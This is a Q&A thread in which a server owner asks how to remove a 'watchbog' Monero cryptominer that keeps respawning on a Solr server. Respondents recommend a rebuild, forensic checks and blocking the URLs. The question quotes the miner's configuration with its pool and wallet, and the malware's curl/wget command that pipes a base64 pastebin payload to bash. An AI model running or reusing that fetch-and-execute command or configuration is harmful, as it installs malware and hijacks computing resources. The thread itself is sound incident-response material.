3

I have found this question below but I need some more clarification that's why I am writing again.

I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is

So I did some digging, and found that an executable is being run from the /tmp directory. The folder structure is something like this:

/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data

In that folder there are two files, one executable watchbog which is actually being run and one config.json. This is the content of the config file,

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}

But deleting the folders is not helping, they are being recreated withing few seconds. So I tried to see what other process are running and I found these

solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog

The pastebin url points to another shell command with another shell command with another pastebin url.

(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash

This second pastebin url points to a base64 encoded shell script. I can't include it here due to character limitation. Here is the link: https://pastebin.com/raw/nMrfmnRa

I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.

This is all I could find on my own, can anyone please guide as to how I can stop this whole thing or would I have to redeploy the server again?

Glorfindel
  • 2,235
  • 6
  • 18
  • 30
Sayantan Das
  • 139
  • 1
  • 4
  • 7
    Your server is compromised, besides the monero miner, there are possible many other compromised including backdoor. Backup important stuff and redeployed server from scratch, install patches and redeploy the server. – mootmoot Jan 11 '19 at 08:32
  • @mootmoot Thank you. I guess i'd have to re deploy the server again. Any idea on how I could possibly approach on finding out how the compromise happened? One thing I could see that the executable is running as user `solr` in the system, which was created when I installed `solr` in the server. Anyway, it's a borad topic so it's okay if you can't help me with that. – Sayantan Das Jan 11 '19 at 09:00
  • Well, you can create the compromised server mirror and test out your hypothesis, e.g. check whether your solr installation contains vulnerabilities or allow query injection that compromised the server. – mootmoot Jan 11 '19 at 10:04
  • The coders at least have a sense of humor. At on of the fail points: "'Sorry boss I can\'t get instructions'" – Connor Peoples Jan 12 '19 at 03:44
  • It is [Monero Mining malware](https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang) from the Rocke Group, which is a Chinese organization. –  Mar 21 '19 at 02:54

2 Answers2

5

From my point of view, there is no way to tell if the rest of the server is safe or not. If I were you, I'd handpick files to save and recreate a fresh server to ensure that it isn't compromised. Otherwise you could end up like BlankMediaGames and having files getting leaked years later. Better safe than sorry

Thryn
  • 301
  • 1
  • 7
0

Maybe, you can determine if the rest of the server is compromised or not, but It depends of a Forensic investigation. You can start with a few command and orientation over this link: https://staff.washington.edu/dittrich/misc/forensics/. It is a little bit basic, but will help you to provide a better recomendation to the business instead simply guess. Meanwhile, I suggest you to create a fresh server to avoid business interruption.

Additionaly, I suggest you to block the malicious URL (the one which communicates over :443) in your network perimeter and check crontab routines.

Ahhhhh... If you found something that is grabbing information from Pastebin, If you have a Pro account, you can ask Pastebin to take down that specific address.

jefferson.macedo
  • 101
  • 3